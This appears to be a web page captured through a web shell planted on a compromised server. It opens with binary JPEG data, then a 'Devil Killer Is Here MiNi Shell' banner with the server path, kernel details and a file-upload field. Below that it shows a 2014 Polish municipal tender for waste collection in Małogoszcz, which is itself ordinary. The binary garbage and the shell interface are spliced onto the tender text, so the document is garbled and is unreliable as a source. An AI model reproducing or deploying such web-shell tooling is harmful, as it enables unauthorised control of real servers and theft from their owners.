JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141120/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141120/380776-N-2014.html

<p class="kh_header"><b>Małogoszcz: ODBIÓR I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH OD WŁAŚCICIELI NIERUCHOMOŚCI ZAMIESZKAŁYCH Z TERENU GMINY MAŁOGOSZCZ W OKRESIE OD 1 STYCZNIA 2015 ROKU DO 30 CZERWCA 2016 ROKU</b><br>
<b>Numer ogłoszenia: 380776 - 2014; data zamieszczenia: 20.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy w Małogoszczu , ul. Jaszowskiego 3a, 28-366 Małogoszcz, woj. świętokrzyskie, tel. 041 3855135, faks 041 3855318.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.malogoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIÓR I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH OD WŁAŚCICIELI NIERUCHOMOŚCI ZAMIESZKAŁYCH Z TERENU GMINY MAŁOGOSZCZ W OKRESIE OD 1 STYCZNIA 2015 ROKU DO 30 CZERWCA 2016 ROKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest:
-odbiór odpadów komunalnych bezpośrednio z nieruchomości na których zamieszkują mieszkańcy z terenu Gminy Małogoszcz
-odbiór odpadów z Punktu Selektywnej Zbiórki Odpadów Komunalnych zlokalizowanego na terenie Oczyszczalni Ścieków w Zakruczu
-wyposażenie nieruchomości na których zamieszkują mieszkańcy oraz Punktu Selektywnej Zbiórki Odpadów Komunalnych w worki i/lub pojemniki służące do zbierania odpadów komunalnych
-przekazywanie odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnej instalacji do przetwarzania odpadów komunalnych wskazanej w Planie gospodarki odpadami dla województwa świętokrzyskiego na lata 2012-2018 dla regionu 3 (Uchwała nr XXI/360/12 Sejmiku Województwa Świętokrzyskiego z dnia 28 czerwca 2012 r. w sprawie uchwalenia Planu gospodarki odpadami dla Województwa Świętokrzyskiego 2012-2018)
-przekazywanie odebranych od właścicieli nieruchomości selektywnie zebranych odpadów komunalnych do instalacji odzysku lub unieszkodliwiania odpadów, zgodnie z hierarchią sposobów postępowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21 z późn. zm.)
-zagospodarowanie zebranych odpadów komunalnych w sposób, który zapewni osiągnięcie określonych w rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 r. (Dz. U. z 2012 r., poz. 645) poziomów recyklingu, przygotowania do ponownego użycia i odzysku następujących frakcji odpadów: papier, metal, tworzywa sztuczne i szkło, inne niż niebezpieczne odpady budowlane i rozbiórkowe.
2.Opis, zakres oraz warunki realizacji zamówienia zostały określone w Szczegółowym Opisie Przedmiotu Zamówienia stanowiącym załącznik nr 1 do SIWZ oraz w projekcie umowy stanowiącym załącznik Nr 9 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.31.00-7, 90.51.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania Wykonawca zobowiązany jest wnieść wadium w wysokości 20.000 zł (słownie: dwadzieścia tysięcy złotych) przed upływem terminu składania ofert tj. do dnia 28.11.2014 r. do godz. 10.00.
Wadium należy wnieść w jednej z form przewidzianych w art. 45 ust. 6 PZP: -pieniądzu przelewem na rachunek bankowy Zamawiającego tj. Urzędu Miasta i Gminy Małogoszcz: Nr 27 8493 0004 0100 0600 0042 0006 - Bank Spółdzielczy Kielce o.Małogoszcz w tytule wpisując: WADIUM NA ODBIÓR I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH OD WŁAŚCICIELI NIERUCHOMOŚCI ZAMIESZKAŁYCH Z TERENU GMINY MAŁOGOSZCZ;-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;-gwarancjach bankowych;-gwarancjach ubezpieczeniowych;-poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r., Nr 42, poz. 275 z późn. zm.).
W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego. 
W przypadku wniesienia wadium w formie gwarancji lub poręczenia, z treści gwarancji (poręczenia) musi wynikać bezwarunkowe zobowiązanie gwaranta (poręczyciela) do wypłaty Zamawiającemu pełnej kwoty wadium, w okolicznościach określonych w art. 46 ust. 4a i 5 PZP, na każde pisemne żądanie zgłoszone przez Zamawiającego, w terminie związania ofertą. Gwarancja (poręczenie) nie powinna zawierać zastrzeżenia gwaranta, że pisemne żądanie zapłaty musi być przedstawione za pośrednictwem banku prowadzącego rachunek Zamawiającego w celu potwierdzenia, ze podpisy złożone na pisemnym żądaniu należą do osób uprawnionych do zaciągania zobowiązań majątkowych w imieniu Zamawiającego.
Do oferty należy dołączyć potwierdzenie wniesienia wadium. 
W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy zamieścić w osobnej kopercie - opisanej Wadium dołączonej do oferty, a kopię dokumentu potwierdzoną za zgodność z oryginałem złączyć z ofertą. Wadium dla grupy Wykonawców występujących wspólnie (konsorcjum) może być wniesione przez jednego z uczestników konsorcjum.Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt. 2 PZP, a jego oferta zostanie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże posiadanie: zezwolenia na transport odpadów na podstawie art. 233 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21) oraz wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez Burmistrza Miasta i Gminy Małogoszcz (wpis musi dotyczyć wszystkich rodzajów odpadów będących przedmiotem usługi).
Wykonawca jest zobowiązany przedłożyć kserokopie powyższych dokumentów. W przypadku składania oferty wspólnej dokumenty składa ten z Wykonawców  składający  ofertę  wspólną,  który  w  ramach  konsorcjum  będzie odpowiadał za realizację prac objętych  uprawnieniem.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże wykonanie lub wykonywanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 zamówienia polegającego na odbiorze odpadów komunalnych o łącznej masie minimum 2.000 Mg przez okres co najmniej 12 miesięcy z podaniem ich wartości, przedmiotu, dat wykonania i odbiorów oraz załączenie dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże dysponowanie zasobami niezbędnymi do realizacji zamówienia zgodnie z wymaganiami określonymi w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r., poz. 122) oraz osobami zdolnymi do wykonania zamówienia.
Wykonawca winien wykazać, że posiada lub będzie posiadał co najmniej:
- 2 samochody specjalistyczne przystosowane do odbierania zmieszanych odpadów komunalnych o ładowności co najmniej 6 Mg;
- 2 samochody specjalistyczne przystosowane do odbioru selektywnie zebranych odpadów komunalnych;
- 1 samochód typu hakowiec do transportu kontenerów typu KP 7;
- 1 samochód o masie całkowitej do 3,5 Mg przystosowany do odbioru odpadów z nieruchomości o utrudnionym dojeździe o szerokości jezdni do 2,5 m;
- 1 samochód do odbioru odpadów wielkogabarytowych.
Wykonawca jest obowiązany podać informacje o podstawie dysponowania wymienionym sprzętem.
Ocena spełnienia ww. warunków nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów: 
- wykazu narzędzi, które będą wykorzystywane przy wykonywaniu zamówienia (załącznik Nr  5  do SIWZ).
Pojazdy powinny być w pełni sprawne, posiadać aktualne badania techniczne, być dopuszczone do ruchu oraz oznakowane widoczną nazwą przedsiębiorcy i numerem tel. firmy. W razie awarii pojazdu Wykonawca zobowiązany jest zapewnić pojazd zastępczy o takich samych parametrach techniczno - eksploatacyjnych.
Wykonawca ma obowiązek zapewnić, aby wszystkie pojazdy wykorzystywane w trakcie realizacji przedmiotu zamówienia wyposażone były w system monitoringu bazującego na systemie pozycjonowania satelitarnego w postaci urządzeń umożliwiających automatyczne zapisywanie w nieulotnej pamięci czas pracy, aktualną lokalizację i przebytą drogę pojazdów w czasie rzeczywistym, jednoznacznie wykazanym wykonywaniem czynności (załadowanie/wyładowanie odpadów). Pamięć danych powinna być przechowywana i odczytywalna minimum przez 60 dni, przy czym odczytanie danych z pamięci nie może powodować kasowania zawartości pamięci urządzenia monitorującego. 
Dane z systemu monitoringu powinny być przechowywane w siedzibie Wykonawcy przez okres minimum 2 lat od dnia ich zapisu. System monitorowania pracy sprzętu ma obejmować:
- bieżące śledzenie pozycji pojazdów w oparciu o wykorzystanie systemu GPS i komunikowanie się z nimi w dowolnym momencie w celu odczytu ww. danych;
- odwzorowanie aktualnej pozycji i przebytej trasy pojazdu na cyfrowej mapie gminy Małogoszcz z dokładnością umożliwiającą jednoznaczne określenie miejsca (adresu) wykonywanej pracy;
- odtwarzanie i analizę historii pracy pojazdów z okresu realizacji umowy oraz prowadzenie jej rozliczenia na podstawie danych odczytanych  z urządzeń monitorujących pracę pojazdów.
Wykonawca ma obowiązek utrzymywać i wyposażyć stanowisko dyspozytorskie w odpowiedni sprzęt komputerowy i telekomunikacyjny umożliwiający wykonanie funkcji opisanych w powyższych punktach, a także zapewnić nieprzerwany dostęp Zamawiającego w dowolnym czasie do danych poprzez sieć internetową (aktualizacja danych: w trakcie prowadzenia odbierania i zagospodarowania odpadów nie rzadziej niż co minutę, w pozostałym okresie nie rzadziej niż raz na dobę na godzinę 8.00);
Wykonawca ma obowiązek wyposażyć stanowisko dyspozytora w niezbędne dla funkcjonowania sytemu elementy zapewniające ciągłą i niezawodną pracę, w szczególności w zasilanie awaryjne UPS umożliwiające pracę sytemu przez min. 1 godzinę po zaniku napięcia w sieci elektrycznej;
Wykonawca ma obowiązek wyposażyć na czas trwania umowy 2 stanowiska komputerowe stanowiące własność Zamawiającego w oprogramowanie do:
- bieżącej kontroli pracy sprzętu wykorzystywanego przez Wykonawcę do wykonania usług związanych z odbieraniem i zagospodarowaniem odpadów komunalnych, z odwzorowaniem na monitorze na aktualnej cyfrowej mapie miasta i gminy Małogoszcz miejsca prowadzenia prac, w zakresie obejmującym co najmniej informacje, o których mowa ppkt. 1.3.7.);
- odczytu i analizy danych bezpośrednio z urządzeń monitorujących zamontowanych na sprzęcie, za pośrednictwem sieci internetowej z komputera bazowego (serwera);
- codziennego archiwizowania danych, 
Wykonawca ma obowiązek zapewnić przeszkolenie osób wybranych przez Zamawiającego w ilości wskazanej przez Zamawiającego (2 osoby) w zakresie obsługi oprogramowania, o którym mowa w ppkt. 1.3.10.) w siedzibie Zamawiającego;
Wykonawca winien wykazać ponadto, że posiada bazę magazynowo - transportową, do której ma tytuł prawny usytuowaną w gminie Małogoszcz lub w odległości nie większej niż 60 km od jej granic, wyposażonej w:
- miejsca do parkowania pojazdów, 
- pomieszczenia socjalne dla pracowników, 
- miejsca do magazynowania selektywnie zebranych odpadów, 
- legalizowaną samochodową wagę najazdową w przypadku gdy na terenie bazy następuje magazynowanie odpadów, 
- punkt bieżącej konserwacji i naprawy pojazdów, 
- miejsce do mycia i dezynfekcji pojazdów o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy magazynowo - transportowej. 
Ponadto Wykonawca powinien: 
- zabezpieczyć teren bazy magazynowo - transportowej przed wstępem osób nieuprawnionych,
- zabezpieczyć miejsca parkowania samochodów przed emisją zanieczyszczeń do gruntu, 
- zabezpieczyć miejsca gromadzenia selektywnie zebranych odpadów komunalnych przed emisją zanieczyszczeń do gruntu oraz zabezpieczyć je przed działaniem czynników atmosferycznych - a także utrzymywać we właściwym stanie sanitarno - technicznym, 
- wyposażyć teren bazy w urządzenia odprowadzające wody opadowe ścieki przemysłowe wg ustawy prawo wodne.
Powyższy warunek zostanie uznany za spełniony, jeżeli Wykonawca dołączy kserokopie dokumentów potwierdzających fakt posiadania bazy magazynowo-transportowej spełniającej wymogi rozporządzenia w zakresie wymagań technicznych jakie powinien spełniać podmiot odbierający odpady komunalne od właścicieli nieruchomości.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże na podstawie przedłożonej informacji z banku lub spółdzielczej kasy oszczędnościowo - kredytowej posiadanie minimum 200.000 zł środków finansowych lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wykaz innych dokumentów wymaganych przez Zamawiającego:
-wypełniony i podpisany Formularz Ofertowy (załącznik Nr 8 do SIWZ);
-pełnomocnictwo do podpisania oferty i występowania w imieniu Wykonawcy w postępowaniu o udzielenie zamówienia, jeżeli Wykonawca nie będzie występował osobiście lub poprzez przedstawiciela upoważnionego w dokumentach rejestrowych: w przypadku osobistego występowania Wykonawcy lub poprzez przedstawiciela upoważnionego w dokumentach rejestrowych Zamawiający nie wymaga złożenia do oferty pełnomocnictwa, - w przypadku przystąpienia do postępowania przetargowego o udzielenie zamówienia publicznego w formie konsorcjum, Zamawiający wymaga złożenia do oferty pełnomocnictwa dla Lidera konsorcjum;
-dokument potwierdzający wniesienie wadium w wysokości 20.000 zł zgodnie z wymaganiami rozdziału XIII. 
-zaakceptowany Projekt Umowy - parafowana każda strona, pieczęć i podpis na ostatniej stronie projektu (załącznik Nr 9 do SIWZ);</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w zakresie terminu wykonania zadania na uzasadniony wniosek Wykonawcy i pod warunkiem, że zmiana ta wynika z okoliczności, których Wykonawca nie mógł przewidzieć na etapie składania oferty i nie jest przez niego zawiniona, o czas trwania zakłócenia, w szczególności, gdy jest spowodowana:
działaniami organów administracji lub innych podmiotów, związane z przekroczeniem obowiązujących terminów wydania lub odmowy wydania: decyzji, zezwoleń, uzgodnień;
